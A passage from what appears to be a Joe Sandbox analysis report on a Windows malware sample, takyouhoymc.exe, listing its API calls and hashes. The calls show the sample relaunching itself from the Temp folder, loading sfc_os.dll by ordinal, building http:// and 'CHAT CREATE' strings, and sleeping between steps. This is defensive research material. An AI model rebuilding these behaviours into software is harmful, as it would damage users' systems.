                                                                                                                                                                                                                                                        • Part of subcall function 00401B8D: CloseHandle.KERNEL32(00000000), ref: 00401C5F
                                                                                                                                                                                                                                                      • ShellExecuteA.SHELL32(00000000,00000000,00000000,0042A774,00000000,00000001), ref: 0040C666
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: FileSleep$lstrlen$AttributesCloseCountCreateExecuteHandleShellTickWritelstrcat
                                                                                                                                                                                                                                                      • String ID: .exe
                                                                                                                                                                                                                                                      • API String ID: 3648662734-4119554291
                                                                                                                                                                                                                                                      • Opcode ID: e8f90210d35fdd40397f299d270fccb0d4b181ca6391d82bf4f94bbb5cf282e5
                                                                                                                                                                                                                                                      • Instruction ID: 4c10d4b1cf75abe528a72ad0bef25bac3a4141dd7ab88e2520ae9ef8a3839170
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e8f90210d35fdd40397f299d270fccb0d4b181ca6391d82bf4f94bbb5cf282e5
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 22110C72A80208BAEF00A794DC06FED737CAB08704F04016BFA00F10D1EAB9A5198679
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000100), ref: 00413D20
                                                                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(sfc_os.dll), ref: 00413D2B
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000005), ref: 00413D34
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: AddressByteCharLibraryLoadMultiProcWide
                                                                                                                                                                                                                                                      • String ID: sfc_os.dll
                                                                                                                                                                                                                                                      • API String ID: 333878435-2681931132
                                                                                                                                                                                                                                                      • Opcode ID: 3c36bd2c1550f0672266681a64d7f472ae4e6c1e8223920922018f43c4b72a64
                                                                                                                                                                                                                                                      • Instruction ID: b7e4b594249faae0cedef0215e17f547bd7fa22e2a5bf3066866e522bee7e195
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3c36bd2c1550f0672266681a64d7f472ae4e6c1e8223920922018f43c4b72a64
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B0E04F317443147BFB205FA0EC4EFA6362CAB04B61F640354BB35E40D0EEF495998B6A
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetModuleHandleA.KERNEL32(KERNEL32,0042226B), ref: 00423BD5
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 00423BE5
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: AddressHandleModuleProc
                                                                                                                                                                                                                                                      • String ID: IsProcessorFeaturePresent$KERNEL32
                                                                                                                                                                                                                                                      • API String ID: 1646373207-3105848591
                                                                                                                                                                                                                                                      • Opcode ID: f12c921f5fd64b11bdb0c36ca5c698a58493f93ababd91f61c6408f13851d5d8
                                                                                                                                                                                                                                                      • Instruction ID: 7d87cd67580a8154b64bb9a0536dc1bb676679c55bbe3d1fe156cc616d992e98
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f12c921f5fd64b11bdb0c36ca5c698a58493f93ababd91f61c6408f13851d5d8
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 25C0125034022256E9202F717C0AF161B28BF00B07FD80062B419D01C1CFACD145547E
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(0041F3FB,00000000), ref: 0040C67A
                                                                                                                                                                                                                                                      • ShellExecuteA.SHELL32(00000000,00000000,C:\Users\user\AppData\Local\Temp\takyouhoymc.exe,00000001,00000000,00000001), ref: 0040C691
                                                                                                                                                                                                                                                      • ExitProcess.KERNEL32 ref: 0040C699
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      • C:\Users\user\AppData\Local\Temp\takyouhoymc.exe, xrefs: 0040C688
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CloseExecuteExitHandleProcessShell
                                                                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\takyouhoymc.exe
                                                                                                                                                                                                                                                      • API String ID: 994193230-1461836236
                                                                                                                                                                                                                                                      • Opcode ID: 39c8a3a203cc93bba26eb6a24b4b94eeff2c464433a66f504b0ee0a69df1a9e2
                                                                                                                                                                                                                                                      • Instruction ID: 70252b09c90ea14362a5bb8daab0397fce26917c22795f88bbac2379e06a643a
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 39c8a3a203cc93bba26eb6a24b4b94eeff2c464433a66f504b0ee0a69df1a9e2
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 08D0EA313C4300BBEA611B90AC0BF583A61AB04B53F648028FB05690E28EA55525DB2E
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,0042B724,?,?,76AF23A0), ref: 00420599
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?,?,?,76AF23A0), ref: 004205A0
                                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 004205A8
                                                                                                                                                                                                                                                        • Part of subcall function 0041F7DB: lstrlenA.KERNEL32(?,http://,?,?,0041FFE6,00000000,?,?,76AF0F00,?,00000000), ref: 0041F7E5
                                                                                                                                                                                                                                                        • Part of subcall function 0041F547: GetTickCount.KERNEL32 ref: 0041F5B6
                                                                                                                                                                                                                                                      • wsprintfA.USER32 ref: 00420731
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CountTicklstrlen$lstrcatwsprintf
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2515930562-0
                                                                                                                                                                                                                                                      • Opcode ID: 53d18ddd1d0079a6accab1dce111c2adebd7c35cfd4130e015f70862a83a2607
                                                                                                                                                                                                                                                      • Instruction ID: b992bff5f20849616ed4f97962bd2e59fa111d5ad7201b43100a5fdde584aae1
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 53d18ddd1d0079a6accab1dce111c2adebd7c35cfd4130e015f70862a83a2607
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F251A471344168AEDB10CA989C81FFA77ECFB5C740F94046BF240E61C2C699ED419B75
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • WriteFile.KERNEL32(?,?,?,?,00000000,00000001,?,?), ref: 00425F2A
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: FileWrite
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3934441357-0
                                                                                                                                                                                                                                                      • Opcode ID: 5cf5ec3bae8b33c1d780aa0061c0b2ae3875ea227d0fa74ca9e8dbcc2347a181
                                                                                                                                                                                                                                                      • Instruction ID: cbbf35ce830668d8617e74e8338189c3f00814dde3f1405b234ef7302bc23b7f
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5cf5ec3bae8b33c1d780aa0061c0b2ae3875ea227d0fa74ca9e8dbcc2347a181
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 52519E31B00698CFDB32CF68ED80BED7BB8AF45704F55012AD8959B251D7B49A01CF1A
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(?,00000000), ref: 0041D7AB
                                                                                                                                                                                                                                                      • lstrcmpA.KERNEL32(00000000,?), ref: 0041D7F3
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000), ref: 0041D800
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: lstrcmplstrcpylstrlen
                                                                                                                                                                                                                                                      • String ID: http://
                                                                                                                                                                                                                                                      • API String ID: 2559493007-1121587658
                                                                                                                                                                                                                                                      • Opcode ID: c6be6e3f908fa445aba55a790cb8d7af42154762c880218be1c3ad3e43d882db
                                                                                                                                                                                                                                                      • Instruction ID: a4590b9bd4e062a28cf3547bf00c85fa10a140c9781eeb4f36f1418112494057
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c6be6e3f908fa445aba55a790cb8d7af42154762c880218be1c3ad3e43d882db
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6A415CB1A043019FD724EF29EC94BA6B7E4FB40715F14493EE865C2691E738E894CB89
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • wsprintfA.USER32 ref: 004201D8
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(000007D0), ref: 00420207
                                                                                                                                                                                                                                                        • Part of subcall function 0041411E: GetTickCount.KERNEL32 ref: 0041411E
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CountSleepTickwsprintf
                                                                                                                                                                                                                                                      • String ID: CHAT CREATE %s$d
                                                                                                                                                                                                                                                      • API String ID: 21340384-1393571586
                                                                                                                                                                                                                                                      • Opcode ID: 6ff5e123241310e84f5d937806fdfd97bc892e57cf58ef5ee357e48b1a968bb9
                                                                                                                                                                                                                                                      • Instruction ID: 9b9521ded8b57a1770c2347fc0122ac2a4d25d25d1d9837db78de688113ac97f
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6ff5e123241310e84f5d937806fdfd97bc892e57cf58ef5ee357e48b1a968bb9
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0941D430604744DFC720EF69D8859AAFBE1FF04304B55896FE08A87652CB39E894CB5E
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 0041F8B9: GetTickCount.KERNEL32 ref: 0041F92B
                                                                                                                                                                                                                                                        • Part of subcall function 0041F8B9: lstrlenA.KERNEL32(?), ref: 0041F966
                                                                                                                                                                                                                                                        • Part of subcall function 0041F8B9: lstrcatA.KERNEL32(?,0042A4E0), ref: 0041F985
                                                                                                                                                                                                                                                        • Part of subcall function 0041F8B9: lstrcatA.KERNEL32(?,0042A4E0), ref: 0041F990
                                                                                                                                                                                                                                                        • Part of subcall function 0041F8B9: lstrcatA.KERNEL32(?,0042A4E0), ref: 0041F99B
                                                                                                                                                                                                                                                        • Part of subcall function 0041F8B9: lstrlenA.KERNEL32(?), ref: 0041F9A2
                                                                                                                                                                                                                                                        • Part of subcall function 0041F8B9: lstrcatA.KERNEL32(?,0042A4E0), ref: 0041F9B2
                                                                                                                                                                                                                                                      • lstrcmpiA.KERNEL32(?,?), ref: 00420A7A
                                                                                                                                                                                                                                                      • lstrcpynA.KERNEL32(00000000,?,00000078,?,?,00000000), ref: 00420A90
                                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 00420AB3
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(000003E8,?,?,00000000), ref: 00420AF4
                                                                                                                                                                                                                                                        • Part of subcall function 004202CD: GetTickCount.KERNEL32 ref: 00420325
                                                                                                                                                                                                                                                        • Part of subcall function 004202CD: Sleep.KERNEL32(0000012C), ref: 00420331
                                                                                                                                                                                                                                                        • Part of subcall function 004202CD: GetTickCount.KERNEL32 ref: 00420366
                                                                                                                                                                                                                                                        • Part of subcall function 004202CD: lstrlenA.KERNEL32(00000000,?,?,?,?,?), ref: 0042038A
                                                                                                                                                                                                                                                        • Part of subcall function 004202CD: GetTickCount.KERNEL32 ref: 00420393
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CountTick$lstrcat$lstrlen$Sleep$lstrcmpilstrcpyn
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 4241744780-0
                                                                                                                                                                                                                                                      • Opcode ID: 44883a3815d3073cb37bdfdc3f1f149689f61383e7c1f7321c827877c69c6c26
                                                                                                                                                                                                                                                      • Instruction ID: 953f808e21a2c27c64224b74544a12e517f99e1642c298c3c56d582e38ba8767
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 44883a3815d3073cb37bdfdc3f1f149689f61383e7c1f7321c827877c69c6c26
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B031DD31B007289FDF30DFA4D845BEA77F5AF14304F90096EE912A6292DB78A949CB54
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 0041F8B9: GetTickCount.KERNEL32 ref: 0041F92B
                                                                                                                                                                                                                                                        • Part of subcall function 0041F8B9: lstrlenA.KERNEL32(?), ref: 0041F966
                                                                                                                                                                                                                                                        • Part of subcall function 0041F8B9: lstrcatA.KERNEL32(?,0042A4E0), ref: 0041F985
                                                                                                                                                                                                                                                        • Part of subcall function 0041F8B9: lstrcatA.KERNEL32(?,0042A4E0), ref: 0041F990
                                                                                                                                                                                                                                                        • Part of subcall function 0041F8B9: lstrcatA.KERNEL32(?,0042A4E0), ref: 0041F99B
                                                                                                                                                                                                                                                        • Part of subcall function 0041F8B9: lstrlenA.KERNEL32(?), ref: 0041F9A2
                                                                                                                                                                                                                                                        • Part of subcall function 0041F8B9: lstrcatA.KERNEL32(?,0042A4E0), ref: 0041F9B2
                                                                                                                                                                                                                                                      • lstrcmpiA.KERNEL32(?,?), ref: 00420951
                                                                                                                                                                                                                                                      • lstrcpynA.KERNEL32(00000000,?,00000078,?,?,00000000), ref: 00420967
                                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 0042098A
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(000003E8,?,?,00000000), ref: 004209D1
                                                                                                                                                                                                                                                        • Part of subcall function 004202CD: GetTickCount.KERNEL32 ref: 00420325
                                                                                                                                                                                                                                                        • Part of subcall function 004202CD: Sleep.KERNEL32(0000012C), ref: 00420331
                                                                                                                                                                                                                                                        • Part of subcall function 004202CD: GetTickCount.KERNEL32 ref: 00420366
                                                                                                                                                                                                                                                        • Part of subcall function 004202CD: lstrlenA.KERNEL32(00000000,?,?,?,?,?), ref: 0042038A
                                                                                                                                                                                                                                                        • Part of subcall function 004202CD: GetTickCount.KERNEL32 ref: 00420393
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
